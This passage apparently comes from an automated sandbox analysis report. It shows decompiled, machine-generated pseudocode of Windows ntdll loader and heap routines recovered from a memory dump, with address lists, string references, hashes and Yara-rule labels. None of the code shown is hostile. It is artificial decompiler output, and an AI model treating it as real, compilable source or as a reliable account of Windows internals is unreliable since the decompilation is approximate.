				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E016D934A() != 0) {
								_t159 = E0174A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x17b5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01745510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x17b5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E016D849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E016D8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E016D8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x17b5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x17b5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E016E2280(_t92, 0x17b86cc);
															_t94 = E01799DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E016F61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x17b5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E016D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x17b5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x17b5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0170F380(_t136, 0x16a1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E016E2280(_t108, 0x17b86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E016F61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01799D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E016DFFB0(_t118, _t156, 0x17b86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01709A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x016d8799
0x016d879d
0x016d87a1
0x016d87a3
0x016d87a8
0x016d87c3
0x016d87c3
0x016d87c8
0x016d87d1
0x016d87d4
0x016d87d8
0x016d87e5
0x016d87ec
0x01729bfe
0x01729c00
0x01729c02
0x01729c08
0x01729c0d
0x01729c0f
0x01729c14
0x01729c2d
0x01729c32
0x01729c37
0x01729c3a
0x01729c3c
0x01729c42
0x01729c42
0x01729c3c
0x01729c02
0x016d87da
0x016d87df
0x016d87e3
0x00000000
0x00000000
0x016d87e3
0x016d87f2
0x00000000
0x016d87fb
0x016d87fd
0x016d87fe
0x016d880e
0x016d880f
0x016d8810
0x016d8814
0x016d881a
0x016d881c
0x016d881f
0x016d8821
0x016d8822
0x016d8824
0x016d8826
0x016d882c
0x016d882e
0x01729c48
0x01729c48
0x016d8834
0x016d8834
0x016d8837
0x00000000
0x00000000
0x016d8837
0x016d882e
0x016d883d
0x016d8840
0x016d8843
0x016d8846
0x016d8849
0x016d884c
0x016d884e
0x016d8850
0x016d8852
0x016d8854
0x016d8857
0x016d88b4
0x016d88b6
0x016d88b6
0x016d8859
0x016d8859
0x016d8859
0x016d8861
0x016d8866
0x016d886a
0x016d893d
0x016d8941
0x00000000
0x016d8947
0x016d8947
0x016d894a
0x016d894c
0x00000000
0x016d8952
0x016d8955
0x016d895a
0x016d895d
0x016d895d
0x016d895f
0x016d8961
0x016d8961
0x016d8968
0x00000000
0x00000000
0x016d896a
0x016d896b
0x016d896e
0x00000000
0x016d8970
0x016d8970
0x016d8970
0x016d8970
0x016d8972
0x016d8972
0x016d8974
0x00000000
0x016d897a
0x016d897a
0x016d897d
0x00000000
0x016d8983
0x01729c65
0x01729c6d
0x01729c72
0x01729c75
0x01729c75
0x01729c82
0x01729c86
0x01729c87
0x01729c88
0x01729c89
0x01729c8c
0x01729c90
0x01729c95
0x01729c97
0x01729ca0
0x01729ca3
0x01729ca9
0x01729ca9
0x00000000
0x01729ca9
0x01729ca3
0x00000000
0x01729c97
0x016d897d
0x00000000
0x016d8974
0x016d8988
0x016d8992
0x016d8996
0x00000000
0x016d8996
0x016d894c
0x00000000
0x016d8870
0x016d887b
0x016d887d
0x016d887f
0x016d8881
0x016d8884
0x016d8884
0x016d8886
0x016d8889
0x016d888c
0x016d888e
0x016d8891
0x016d8891
0x016d8898
0x00000000
0x00000000
0x016d889a
0x016d889b
0x016d889e
0x00000000
0x00000000
0x016d88a0
0x016d88a8
0x016d88b0
0x016d88b2
0x016d88d3
0x016d88d5
0x00000000
0x016d88d7
0x016d88db
0x016d88dc
0x016d88e0
0x016d88e8
0x016d88ee
0x016d88f0
0x016d88f3
0x016d88fc
0x016d8901
0x016d8906
0x016d890c
0x016d890c
0x016d890f
0x016d8916
0x016d8917
0x016d8918
0x016d8919
0x016d891a
0x016d891f
0x016d8921
0x01729c52
0x01729c55
0x01729c5b
0x01729cac
0x01729cc0
0x01729cc0
0x01729c55
0x016d8927
0x016d8927
0x016d892f
0x016d8933
0x00000000
0x016d88f5
0x016d88f5
0x00000000
0x016d88f7
0x016d88f7
0x016d88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x016d88fa
0x016d88f5
0x016d88f3
0x00000000
0x016d88d5
0x00000000
0x016d88b2
0x016d88c9
0x00000000
0x016d88c9
0x016d887f
0x016d886a
0x016d8857
0x016d8852
0x016d88bf
0x016d88bf
0x016d87aa
0x016d87ad
0x016d87ae
0x016d87b4
0x016d87b5
0x016d87b6
0x016d87b8
0x016d87bd
0x016d87c1
0x016d87f4
0x016d87fa
0x00000000
0x00000000
0x00000000
0x016d87c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01729C18
LdrpDoPostSnapWork, xrefs: 01729C1E
minkernel\ntdll\ldrsnap.c, xrefs: 01729C28

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: bec86fcdfaada5305ca51a58de28f0a01606bfef76871df2532c3ae7f834ee12
Instruction ID: 006cdcae71b8adb64e0b50a805d14e8246417b4923d966ffac8206304b7c3265
Opcode Fuzzy Hash: bec86fcdfaada5305ca51a58de28f0a01606bfef76871df2532c3ae7f834ee12
Instruction Fuzzy Hash: 0F910471E002169FEB18DF5DDC89ABAB7BAFF44314B4A416DDA05AB241D730ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 016D7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E016D7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E016DCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E016CC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x17b5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01745510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x17b5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E016E7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E016E7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01747016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E016E7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E016E7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01747016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E016FA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E016CB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x016d7e4c
0x016d7e50
0x016d7e55
0x016d7e58
0x016d7e5d
0x016d7e71
0x016d7f33
0x016d7e77
0x016d7e77
0x016d7e79
0x016d7e79
0x016d7e7e
0x016d7f45
0x01729848
0x00000000
0x01729848
0x016d7f4e
0x016d7f53
0x016d7f5a
0x00000000
0x00000000
0x0172985a
0x01729862
0x01729866
0x00000000
0x0172986c
0x00000000
0x0172986c
0x016d7e84
0x016d7e84
0x016d7e8d
0x01729871
0x016d7eb8
0x016d7ec0
0x016d7ec0
0x016d7e9a
0x0172987e
0x00000000
0x00000000
0x01729884
0x0172988b
0x017298a7
0x017298ac
0x017298b1
0x017298b6
0x017298b8
0x017298b8
0x017298b9
0x00000000
0x017298b9
0x016d7ea0
0x016d7ea7
0x00000000
0x00000000
0x016d7eac
0x016d7eb1
0x016d7ec6
0x016d7ed0
0x017298cc
0x016d7ed6
0x016d7ed6
0x016d7ed6
0x016d7ede
0x016d7ee3
0x017298e3
0x017298f0
0x01729902
0x017298f2
0x017298fb
0x017298fb
0x01729907
0x0172991d
0x0172991d
0x01729907
0x017298e3
0x016d7ef0
0x016d7f14
0x016d7f14
0x016d7f1e
0x01729946
0x016d7f24
0x016d7f24
0x016d7f24
0x016d7f2c
0x0172996a
0x01729975
0x01729975
0x0172997e
0x01729993
0x01729993
0x0172997e
0x00000000
0x016d7ef2
0x016d7efc
0x016d7f0a
0x016d7f0e
0x01729933
0x00000000
0x01729933
0x00000000
0x016d7f0e
0x00000000
0x00000000
0x00000000
0x016d7eb1

Strings

LdrpCompleteMapModule, xrefs: 01729898
Could not validate the crypto signature for DLL %wZ, xrefs: 01729891
minkernel\ntdll\ldrmap.c, xrefs: 017298A2

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 27e885bc903c42022b38849c855caa513082063f5447503100e39fbe25a62e17
Instruction ID: dde8ec0c3873412e216637e53d17ac393361e8a77221b91473c3f6696dd0b7bc
Opcode Fuzzy Hash: 27e885bc903c42022b38849c855caa513082063f5447503100e39fbe25a62e17
Instruction Fuzzy Hash: D0510431A00755DBE722CB6CCD44B6ABBE4EF40718F180699EA519B7E1D770ED01CB92

Uniqueness

Uniqueness Score: -1.00%

Function 016CE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E016CE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E016CF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E017095D0();
						}
						if(_t78 != 0) {
							L016E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0170FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0170BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01709600();
					if(_t97 < 0) {
						goto L6;
					}
					E0170BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L016CF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0170BB40(_t83, _t102 + 0x24, _t78);
								if(L016D43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0170BB40(_t84, _t102 + 0x24, _t94);
									if(L016D43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x016ce620
0x016ce628
0x016ce62f
0x016ce631
0x016ce635
0x016ce637
0x016ce63e
0x01725503
0x01725503
0x016ce64c
0x016ce64c
0x016ce651
0x00000000
0x00000000
0x016ce661
0x016ce665
0x0172542a
0x016ce715
0x016ce71a
0x016ce71c
0x016ce720
0x016ce720
0x016ce727
0x016ce736
0x016ce736
0x016ce743
0x016ce743
0x016ce673
0x016ce678
0x016ce67d
0x016ce682
0x016ce685
0x016ce692
0x016ce69b
0x016ce6a3
0x016ce6ad
0x016ce6b1
0x016ce6b2
0x016ce6bb
0x016ce6bf
0x016ce6c0
0x016ce6c8
0x016ce6cc
0x016ce6d5
0x016ce6d9
0x00000000
0x00000000
0x016ce6e5
0x016ce6ea
0x016ce6f9
0x016ce70b
0x016ce70f
0x01725439
0x0172545e
0x0172545e
0x00000000
0x0172545e
0x0172543b
0x0172543e
0x01725440
0x01725445
0x01725472
0x01725475
0x0172548d
0x01725493
0x017254a9
0x00000000
0x00000000
0x017254ab
0x017254b4
0x017254bc
0x017254c8
0x017254de
0x017254fb
0x017254e0
0x017254e6
0x017254eb
0x017254eb
0x017254de
0x00000000
0x017254bc
0x01725477
0x0172547a
0x01725480
0x01725483
0x01725486
0x0172548b
0x00000000
0x00000000
0x00000000
0x0172548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01725447
0x01725447
0x01725447
0x01725447
0x0172544e
0x00000000
0x00000000
0x01725450
0x01725452
0x01725455
0x0172545a
0x00000000
0x00000000
0x00000000
0x0172545c
0x0172546a
0x0172546d
0x0172546f
0x00000000
0x0172546f
0x016ce70f

Strings

InstallLanguageFallback, xrefs: 016CE6DB
@, xrefs: 016CE6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 016CE68C

Memory Dump Source

Source File: 0000000E.00000002.782536075.00000000016A0000.00000040.00000001.sdmp, Offset: 016A0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: c0c09eed6212e074b873a542a9d77f396ce566a1f360c4fce36220f53a802126
Instruction ID: 39f51671c6c08353afe730aa377e25c2669c31105e3e18b757f00383fc0673d7
Opcode Fuzzy Hash: c0c09eed6212e074b873a542a9d77f396ce566a1f360c4fce36220f53a802126
Instruction Fuzzy Hash: 5651C1765083169BD711DF68C854ABBF7E8EF88614F05092EFA89D7240FB34DA05C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0178E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0178E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0178BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0178BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0178AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01709730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0178A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0178A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01709730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0178A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0178A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E016E2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E016DB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E016DFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E016E7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0177FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0178e547
0x0178e549
0x0178e54f
0x0178e553
0x0178e557
0x0178e55a
0x0178e55c
0x0178e55f
0x0178e561
0x0178e567
0x0178e56b
0x0178e7e2
0x00000000
0x0178e571
0x0178e575
0x0178e577
0x0178e57b
0x0178e57c
0x0178e57d
0x0178e57e
0x0178e57f
0x0178e588
0x0178e58f
0x0178e591
0x0178e592
0x0178e592
0x0178e596
0x0178e59e
0x0178e5a0
0x0178e5a6
0x0178e61d
0x0178e61d
0x0178e621
0x0178e623
0x0178e630
0x0178e630
